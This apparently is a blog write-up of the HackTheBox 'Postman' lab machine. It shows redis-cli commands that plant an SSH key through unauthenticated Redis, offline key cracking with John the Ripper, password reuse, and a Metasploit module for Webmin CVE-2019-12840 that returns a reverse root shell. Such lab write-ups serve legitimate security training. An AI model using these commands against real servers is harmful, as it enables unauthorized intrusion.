{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreiacmets4ikwuseqpr54h2b6u3yo43b6o2yskaat53bu6rsr63tziy",
"uri": "at://did:plc:25rdn5elo5izoxrmtis34zuk/app.bsky.feed.post/3motr2nrzf6c2"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreig5acpw2wv4fyjn5ozgqowz5rds6mo3r6dxibqggkrisfsejmimva"
},
"mimeType": "image/webp",
"size": 305428
},
"path": "/exploitnotes/hackthebox-postman-writeup-278l",
"publishedAt": "2026-06-22T01:22:26.000Z",
"site": "https://dev.to",
"tags": [
"cybersecurity",
"redis",
"ctf",
"hackthebox"
],
"textContent": "## Summary\n\nPostman is an easy-rated Linux machine on HackTheBox. The box exposes an unauthenticated Redis instance that allows writing an SSH public key to the `redis` user's `.ssh` directory, granting initial shell access. From there, an encrypted RSA private key belonging to user `Matt` is recovered, cracked offline with John the Ripper, and reused (due to password reuse) to `su` into `Matt` for the user flag. Enumeration of Matt's owned files reveals a hint pointing to the previously unchecked Webmin service on port 10000, where the same reused password grants admin access to Webmin 1.910 — vulnerable to CVE-2019-12840, an authenticated RCE via the Package Updates module — leading to a root shell.\n\n## Recon\n\n\n nmap -sC -sV -p- -A <MACHINE-IP> -oA nmap\n\n\nOpen ports:\n\nPort | Service | Version\n---|---|---\n22 | SSH | OpenSSH 7.6p1 (Ubuntu)\n80 | HTTP | Apache 2.4.29 — \"The Cyber Geek's Personal Website\"\n6379 | Redis | Redis 4.0.9\n10000 | HTTP (initially missed) | MiniServ 1.910 (Webmin), SSL-only\n\nThe port 80 site is a static personal page and doesn't yield credentials or paths directly. The standout finding is Redis on 6379 with no authentication configured.\n\n## Foothold via Redis Key Write\n\nConnecting to Redis unauthenticated confirms no `requirepass` is set:\n\n\n\n redis-cli -h <MACHINE-IP>\n CONFIG GET *\n\n\nKey fields of interest:\n\n * `requirepass` — empty (no auth)\n * `dir` — `/var/lib/redis`\n * `dbfilename` — `dump.rdb`\n\n\n\nSince Redis runs as the `redis` system user (which has an `.ssh` folder in its home directory), the classic Redis SSH-key-write technique applies: tell Redis to save its data file directly into `~redis/.ssh/authorized_keys`, with an SSH public key stored as the value of a Redis key. The padding newlines around the key keep the surrounding RDB file bytes from corrupting the key line.\n\n\n\n (echo; echo; cat ~/.ssh/id_rsa.pub; echo; echo) | redis-cli -h <MACHINE-IP> -x set mykey\n redis-cli -h <MACHINE-IP> config set dir /var/lib/redis/.ssh\n redis-cli -h <MACHINE-IP> config set dbfilename authorized_keys\n redis-cli -h <MACHINE-IP> save\n\n\n\n ssh -i ~/.ssh/id_rsa redis@<MACHINE-IP>\n\n\nThis lands a shell as `redis` (uid 107, low-privilege, group `redis` only).\n\n## Privilege Pivot: Matt's Encrypted SSH Key\n\nAs `redis`, a search for files owned by `Matt` turns up:\n\n\n\n find / -type f -user Matt 2>/dev/null\n\n\nNotably `/opt/id_rsa.bak` — a PEM RSA private key, encrypted (`DEK-Info: DES-EDE3-CBC`). After copying it locally and preparing it for cracking:\n\n\n\n ssh2john matt-key > matt-key.hash\n john --wordlist=/usr/share/wordlists/rockyou.txt matt-key.hash\n\n\nJohn recovers the passphrase: `computer2008`.\n\nDecrypting the key locally with `openssl rsa -in matt-key -out matt-key-decrypted` works, but a direct SSH login attempt as `matt` using the decrypted key is rejected (key not authorized for that account over SSH). Given the password reuse pattern already established by needing it to decrypt the key, the same passphrase is tried directly against the `Matt` Linux account from the existing `redis` shell:\n\n\n\n su Matt\n # password: computer2008\n\n\nThis succeeds, yielding the user flag at `/home/Matt/user.txt`.\n\n`sudo -l` confirms Matt has no sudo rights, so a different angle is needed for root.\n\n## Escalation: Webmin RCE (CVE-2019-12840)\n\nReviewing files owned by `Matt` again surfaces `/var/www/SimpleHTTPPutServer.py`, a custom Python 2 HTTP PUT server script. This is a hint that port 80 isn't the only web service worth revisiting — prompting a second look at port 10000, which earlier scans flagged only generically as MiniServ/Webmin and had not been enumerated further. Browsing to it over HTTPS shows a Webmin login page for host `postman.htb`, with the dashboard (once authenticated) confirming **Webmin version 1.910** on Ubuntu 18.04.3.\n\nGiven the established password reuse pattern, `Matt` / `computer2008` is tried against the Webmin login and succeeds with admin access.\n\nWebmin 1.910 is vulnerable to **CVE-2019-12840** , an authenticated remote command execution in the Package Updates module, exploitable via Metasploit:\n\n\n\n use exploit/linux/http/webmin_packageup_rce\n set rhosts <MACHINE-IP>\n set rport 10000\n set ssl yes\n set username Matt\n set password computer2008\n set lhost <LOCAL-TUN0-IP>\n set lport 3333\n run\n\n\nThe module returns a command shell running as **root** :\n\n\n\n whoami\n root\n cat /root/root.txt\n\n\n## Flags\n\n * **User flag (Matt):** `HTB{REDACTED}`\n * **Root flag:** `HTB{REDACTED}`\n\n\n\n## Attack Chain\n\n 1. Unauthenticated Redis (6379) → write SSH public key into `redis` user's `authorized_keys` via `CONFIG SET dir/dbfilename` + `SAVE`\n 2. SSH in as `redis` (low-privilege foothold)\n 3. Locate `/opt/id_rsa.bak`, an encrypted RSA key owned by `Matt`\n 4. Crack passphrase offline with `ssh2john` + John the Ripper + rockyou.txt → `computer2008`\n 5. Password reuse: `su Matt` with the cracked passphrase → user flag\n 6. Enumerate files owned by `Matt`, find a hint pointing back to an unchecked web service on port 10000 (Webmin)\n 7. Password reuse again: log into Webmin 1.910 as `Matt` / `computer2008`\n 8. Exploit CVE-2019-12840 (Package Updates module authenticated RCE) via Metasploit → root shell → root flag\n\n\n\n## Key Vulnerabilities\n\nVulnerability | Description\n---|---\nUnauthenticated Redis instance | No `requirepass` set; allows arbitrary file write via `CONFIG SET dir/dbfilename` + `SAVE`, enabling SSH key injection\nWeak/reused credentials | Passphrase `computer2008` protecting Matt's backup SSH key was crackable via rockyou.txt and was reused for both the Linux account and the Webmin panel\nCVE-2019-12840 | Webmin ≤ 1.910 Package Updates module authenticated remote command execution, leading directly to root\nSensitive file left on disk | `/opt/id_rsa.bak`, an encrypted private key for `Matt`, was world-readable and enabled the entire escalation path",
"title": "HackTheBox: Postman Writeup"
}